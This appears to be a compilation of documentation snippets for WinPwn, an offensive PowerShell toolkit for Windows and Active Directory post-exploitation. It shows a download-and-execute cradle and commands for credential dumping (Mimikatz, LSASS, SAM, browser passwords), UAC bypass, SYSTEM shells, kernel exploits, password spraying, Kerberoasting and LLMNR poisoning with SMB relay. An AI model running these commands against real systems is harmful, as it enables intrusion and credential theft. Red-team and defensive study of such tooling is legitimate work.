### Execute Local Reconnaissance Modules Source: https://github.com/s3cur3th1ssh1t/winpwn/blob/master/README.md Invoking `Localreconmodules` initiates a comprehensive local system reconnaissance scan. It gathers information on installed software, vulnerabilities, network details, shares, and checks for common misconfigurations and sensitive data. ```powershell Localreconmodules ``` -------------------------------- ### Offline Mode Setup Source: https://context7.com/s3cur3th1ssh1t/winpwn/llms.txt Enables WinPwn to function in air-gapped environments by using an offline version with embedded tools or by setting up a local repository server. ```powershell # Use offline version with bundled scripts Import-Module .\Offline_WinPwn.ps1 # Or set up local repository server ./Get_WinPwn_Repo.sh --install ./Get_WinPwn_Repo.sh --start-server # Then connect from target WinPwn -repo http://192.168.1.10:8000/WinPwn_Repo ``` -------------------------------- ### Download and Import WinPwn PowerShell Script Source: https://github.com/s3cur3th1ssh1t/winpwn/blob/master/README.md This code snippet downloads the WinPwn.ps1 script directly from its GitHub repository and executes it using `Invoke-Expression`. This method is useful for quickly loading WinPwn without manually downloading the file, assuming internet connectivity. ```powershell iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/WinPwn.ps1') ``` -------------------------------- ### Import WinPwn PowerShell Module Source: https://context7.com/s3cur3th1ssh1t/winpwn/llms.txt Demonstrates how to load the WinPwn PowerShell module into a session, either from a local file or a remote URL. This is the initial step before utilizing any WinPwn functionalities. ```powershell # Import from local file Import-Module .\WinPwn.ps1 # Import from remote URL iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/WinPwn.ps1') # Launch the interactive menu WinPwn ``` -------------------------------- ### SharpCradle .NET Assembly Execution Source: https://context7.com/s3cur3th1ssh1t/winpwn/llms.txt Loads and executes .NET assemblies directly in memory, enabling the use of various security tools like Seatbelt, Rubeus, and SharpWeb without dropping files to disk. ```powershell # Interactive .NET execution menu sharpcradle -allthosedotnet # Executes: # - Seatbelt (system enumeration) # - Rubeus (Kerberos attacks) # - Watson (vulnerability detection) # - SharpWeb (browser credentials) # - SharpUp (privilege escalation) # - InternalMonologue (NTLM hash retrieval without LSASS) # Custom binary execution sharpcradle -web # Then provide URL to .NET executable ``` -------------------------------- ### Execute Kittielocal Module Source: https://github.com/s3cur3th1ssh1t/winpwn/blob/master/README.md The `Kittielocal` module in WinPwn provides a collection of local reconnaissance and credential dumping functionalities. It includes obfuscated Mimikatz, Safetykatz, LSASS dumping, credential exfiltration, and more. ```powershell Kittielocal ``` -------------------------------- ### Execute Privilege Escalation Modules Source: https://github.com/s3cur3th1ssh1t/winpwn/blob/master/README.md This snippet shows how to call the `Privescmodules` function. This module integrates various privilege escalation tools and checks, including Invoke-PrivescCheck, winPEAS, PowerUp, Sherlock, and checks for common privilege escalation vectors like Dll Hijacking and weak file/registry permissions. ```powershell Privescmodules ``` -------------------------------- ### Execute SessionGopher Module Source: https://github.com/s3cur3th1ssh1t/winpwn/blob/master/README.md This snippet shows how to invoke the `SessionGopher` module from WinPwn. Upon execution, it prompts the user for necessary parameters to run SessionGopher, a tool for retrieving session information. ```powershell SessionGopher ``` -------------------------------- ### Execute Domain Shares Module Source: https://github.com/s3cur3th1ssh1t/winpwn/blob/master/README.md The `Domainshares` function utilizes Snaffler or Passhunt to search for sensitive information or credentials within domain-wide file shares. This is crucial for discovering exposed data across the network. ```powershell Domainshares ``` -------------------------------- ### Execute Inveigh Module Source: https://github.com/s3cur3th1ssh1t/winpwn/blob/master/README.md The `Inveigh` function within WinPwn is designed to execute the Inveigh tool. It launches Inveigh in a new console window and integrates SMB-Relay attacks with Session management capabilities, specifically mentioning Invoke-TheHash. ```powershell Inveigh ``` -------------------------------- ### WinPwn Main Menu and Non-Interactive Execution Source: https://context7.com/s3cur3th1ssh1t/winpwn/llms.txt Shows how to launch the interactive WinPwn menu or execute specific modules in a non-interactive mode with console output. This includes options for domain reconnaissance, local reconnaissance, running PowerSharpPack tools, and using an offline repository. ```powershell # Interactive mode - displays menu for module selection WinPwn # Non-interactive domain reconnaissance with console output WinPwn -noninteractive -consoleoutput -DomainRecon # Non-interactive local reconnaissance WinPwn -noninteractive -consoleoutput -Localrecon # Execute PowerSharpPack tools (Seatbelt, PowerUp, Watson, etc.) WinPwn -PowerSharpPack -consoleoutput -noninteractive # Use offline repository for air-gapped environments WinPwn -repo http://192.168.1.10:8000/WinPwn_Repo ``` -------------------------------- ### Execute Domain Reconnaissance Modules Source: https://github.com/s3cur3th1ssh1t/winpwn/blob/master/README.md The `Domainreconmodules` function performs extensive reconnaissance across the Active Directory domain. It collects domain information, searches for passwords in descriptions, identifies sensitive shares, enumerates delegation systems, generates Bloodhound reports, and scans for vulnerabilities. ```powershell Domainreconmodules ``` -------------------------------- ### SYSTEM Shell Techniques Source: https://context7.com/s3cur3th1ssh1t/winpwn/llms.txt Provides methods to obtain SYSTEM-level shell access, including CreateProcess, bind shells, named pipe impersonation, UsoClient DLL loading, and token manipulation. ```powershell # Interactive SYSTEM shell menu SYSTEMShell # Available techniques: # 1. CreateProcess method # 2. Bind shell via CreateProcess # 3. NamedPipe Impersonation # 4. UsoClient DLL loading # 5. Token Manipulation ``` -------------------------------- ### Execute UAC Bypass Module Source: https://github.com/s3cur3th1ssh1t/winpwn/blob/master/README.md This snippet demonstrates invoking the `UACBypass` module. It offers several techniques for bypassing User Account Control (UAC) on Windows systems, based on established research and methods like cmstp, DiskCleanup, and DccwBypassUAC. ```powershell UACBypass ``` -------------------------------- ### Import WinPwn PowerShell Module Source: https://github.com/s3cur3th1ssh1t/winpwn/blob/master/README.md This snippet demonstrates how to import the WinPwn.ps1 module into your PowerShell session. This is the primary step to access all the functionalities provided by WinPwn. Ensure the script is in your current directory or provide the correct path. ```powershell Import-Module .\WinPwn.ps1 ``` -------------------------------- ### Execute Share Enumeration Module Source: https://github.com/s3cur3th1ssh1t/winpwn/blob/master/README.md Invoking `Shareenumeration` executes tools like Invoke-Filefinder and Invoke-Sharefinder, which are part of the Powerview/Powersploit suite. These tools are used to enumerate file shares on the network. ```powershell Shareenumeration ``` -------------------------------- ### Execute SYSTEM Shell Module Source: https://github.com/s3cur3th1ssh1t/winpwn/blob/master/README.md The `SYSTEMShell` function allows users to obtain a SYSTEM-level shell on the target Windows machine. It provides multiple methods for achieving this, including using `CreateProcess`, Named Pipe Impersonation, Token Manipulation, and UsoClient DLL load. ```powershell SYSTEMShell ``` -------------------------------- ### BloodHound Collection Module Source: https://context7.com/s3cur3th1ssh1t/winpwn/llms.txt Generates Active Directory attack path data compatible with BloodHound 3.0 for visualization and analysis. Uses the SharpHound collector. ```powershell # Run SharpHound collector Sharphound # Generates BloodHound 3.0 compatible JSON files # for attack path visualization ``` -------------------------------- ### WinPwn Menu Functionality Source: https://github.com/s3cur3th1ssh1t/winpwn/blob/master/README.md After importing the WinPwn module, the `WinPwn` function becomes available. Executing this function typically brings up a menu interface, allowing users to select from various attack and reconnaissance modules. ```powershell WinPwn ``` -------------------------------- ### WinPwn Domain Reconnaissance Module Source: https://context7.com/s3cur3th1ssh1t/winpwn/llms.txt Explains how to perform Active Directory enumeration using WinPwn's Domain Reconnaissance module. It supports interactive and non-interactive modes and includes features for user/group enumeration, delegation attacks, BloodHound collection, and vulnerability scanning. ```powershell # Interactive domain reconnaissance Domainreconmodules # Non-interactive execution WinPwn -noninteractive -consoleoutput -DomainRecon # Features include: # - AD password discovery in description fields # - Unconstrained delegation enumeration # - BloodHound/SharpHound data collection # - MS17-010 and BlueKeep scanning # - PowerUpSQL for SQL Server discovery # - MS-RPRN printer bug checks # - Grouper2 GPO auditing # - ADRecon CSV/XLS reporting # - ZeroLogon (CVE-2020-1472) checking # - Resource-Based Constrained Delegation paths ``` -------------------------------- ### SessionGopher Credential Search Source: https://context7.com/s3cur3th1ssh1t/winpwn/llms.txt Searches for saved session information from various client applications like PuTTY, WinSCP, FileZilla, SuperPuTTY, and RDP. Supports interactive, local, and domain-wide searches. ```powershell # Interactive session search SessionGopher # Local system only with thorough tests SessionGopher -noninteractive -consoleoutput # Domain-wide search (time intensive) SessionGopher -noninteractive -consoleoutput -allsystems ``` -------------------------------- ### WinPwn Credential Dumping (Kittielocal) Source: https://context7.com/s3cur3th1ssh1t/winpwn/llms.txt Details the Kittielocal module for credential extraction from various sources like memory, registry, SAM, browsers, and applications. It offers interactive and non-interactive options for dumping credentials, including obfuscated Mimikatz and LSASS dumping. ```powershell # Interactive credential menu Kittielocal # Dump Windows Credential Manager (no admin required) Kittielocal -noninteractive -consoleoutput -credentialmanager # Obfuscated Mimikatz execution (requires admin) Kittielocal -noninteractive -consoleoutput -mimikittie # Dump LSASS using rundll32 technique (requires admin) Kittielocal -noninteractive -consoleoutput -rundll32lsass # Browser credential extraction Kittielocal -noninteractive -consoleoutput -browsercredentials # SAM file NTLM hash extraction (requires admin) Kittielocal -noninteractive -consoleoutput -samdump # WiFi credential extraction (requires admin) Kittielocal -noninteractive -consoleoutput -wificredentials # Cloud credential file discovery Kittielocal -noninteractive -consoleoutput -sharpcloud # TeamViewer password decryption Kittielocal -noninteractive -consoleoutput -teamviewer ``` -------------------------------- ### Vulnerability Scanning Modules Source: https://context7.com/s3cur3th1ssh1t/winpwn/llms.txt Scans for specific critical vulnerabilities across domain systems, including MS17-010 (EternalBlue), BlueKeep (CVE-2019-0708), and checks for vulnerable drivers against loldrivers.io. ```powershell # MS17-010 (EternalBlue) scanning MS17-10 # BlueKeep (CVE-2019-0708) scanning Bluekeep # Checks for vulnerable drivers against loldrivers.io vulnerabledrivers ``` -------------------------------- ### Execute Kernel Exploits Module Source: https://github.com/s3cur3th1ssh1t/winpwn/blob/master/README.md The `kernelexploits` function provides access to a list of known kernel-level exploits for various Windows versions. This includes exploits like MS15-077, MS16-032, MS16-135, and several CVEs, targeting different Windows vulnerabilities. ```powershell kernelexploits ``` -------------------------------- ### Kerberoasting Ticket Extraction Source: https://context7.com/s3cur3th1ssh1t/winpwn/llms.txt Extracts service account tickets from Active Directory for offline password cracking using tools like hashcat. Supports interactive mode and integration with Rubeus. ```powershell # Interactive Kerberoasting Kerberoasting # Using Rubeus (via PowerSharpPack) sharpcradle -allthosedotnet # Output formats for hashcat cracking: # - AS-REP roasting hashes # - Kerberoast hashes # Saved to .\Exploitation\ folder ``` -------------------------------- ### WinPwn Local Reconnaissance Module Source: https://context7.com/s3cur3th1ssh1t/winpwn/llms.txt Details the usage of the Local Reconnaissance module in WinPwn, covering both interactive and non-interactive execution with console or file output. It collects system information, network details, software, vulnerabilities, and sensitive files. ```powershell # Interactive local reconnaissance Localreconmodules # Non-interactive with file output Localreconmodules -noninteractive # Non-interactive with console output only Localreconmodules -noninteractive -consoleoutput # Output includes: # - System information and patches # - Network interfaces, routes, ARP table # - SMB signing status # - WSUS over HTTP vulnerability check # - AlwaysInstallElevated check # - NetBIOS and IPv6 status # - Installed software and vulnerable versions # - Sensitive files (config, RDP, KeePass databases) # - Registry password searches ``` -------------------------------- ### WinPwn Privilege Escalation Module Source: https://context7.com/s3cur3th1ssh1t/winpwn/llms.txt Describes the Privilege Escalation module in WinPwn, which checks for common Windows privilege escalation vectors using multiple tools. It includes checks for Invoke-PrivescCheck, winPEAS, PowerUp, Sherlock, GPP passwords, DLL hijacking, and more. ```powershell # Interactive privilege escalation menu Privescmodules # Runs multiple checks: # - itm4n's Invoke-PrivescCheck # - winPEAS # - PowerUp AllChecks # - Sherlock # - GPP Passwords # - DLL hijacking opportunities # - File/Registry permission weaknesses # - Rotten/Juicy Potato eligibility ``` -------------------------------- ### Active Directory DNS Manipulation Source: https://context7.com/s3cur3th1ssh1t/winpwn/llms.txt Allows for the creation and removal of AD-integrated DNS records, including custom nodes and wildcard entries. Use wildcard entries with caution due to potential network disruption. ```powershell # Interactive ADIDNS menuadidnsmenu # Add custom DNS nodeadidns -add # Remove DNS nodeadidns -remove # Add wildcard entry (use with caution - can cause network disruption)adidns -addwildcard # Remove wildcard entryadidns -removewildcard ``` -------------------------------- ### Domain Password Spraying Source: https://context7.com/s3cur3th1ssh1t/winpwn/llms.txt Performs password spray attacks against domain accounts, attempting a single password against all users with lockout-aware throttling to minimize detection. ```powershell # Interactive password spray DomainPassSpray # Attempts single password against all domain users # with lockout-aware throttling ``` -------------------------------- ### Inveigh LLMNR/NBT-NS Poisoning Source: https://context7.com/s3cur3th1ssh1t/winpwn/llms.txt Initiates network poisoning attacks to capture credentials and facilitate relay attacks. Supports LLMNR, NBT-NS, mDNS poisoning, DHCPv6 spoofing, and SMB relay. ```powershell # Start Inveigh with interactive prompts Inveigh # Automatically enables: # - LLMNR/NBT-NS/mDNS poisoning # - DHCPv6 spoofing # - SMB relay attacks (with Invoke-TheHash integration) # - Session management for captured credentials # Post-exploitation with captured sessions: # Get-Inveigh -Session # Invoke-SMBClient, Invoke-SMBEnum, Invoke-SMBExec ``` -------------------------------- ### Offline WinPwn Usage Source: https://github.com/s3cur3th1ssh1t/winpwn/blob/master/README.md The `Offline_Winpwn.ps1` script is provided for environments without internet access. It contains essential scripts and executables bundled within, allowing core WinPwn functionalities to be used offline. ```powershell Import-Module .\Offline_Winpwn.ps1 ``` -------------------------------- ### WinPwn Kernel Exploits Module Source: https://context7.com/s3cur3th1ssh1t/winpwn/llms.txt Introduces the Kernel Exploits module in WinPwn, providing access to various Windows kernel exploits for privilege escalation to SYSTEM. The module offers an interactive menu for selecting available exploits. ```powershell # Interactive kernel exploit menu Kernelexploits # Available exploits: ``` -------------------------------- ### UAC Bypass Module Source: https://context7.com/s3cur3th1ssh1t/winpwn/llms.txt Bypasses User Account Control (UAC) to execute commands with high integrity. Supports interactive and non-interactive modes, with specific techniques like CMSTP. ```powershell # Interactive UAC bypass menu UACBypass # Non-interactive with specific technique UACBypass -noninteractive -command "C:\temp\stager.exe" -technique ccmstp # Available techniques: # - UAC Magic (James Forshaw) # - CMSTP technique (Oddvar Moe) # - DiskCleanup bypass # - DccwBypassUAC ``` === COMPLETE CONTENT === This response contains all available snippets from this library. No additional content exists. Do not make further requests.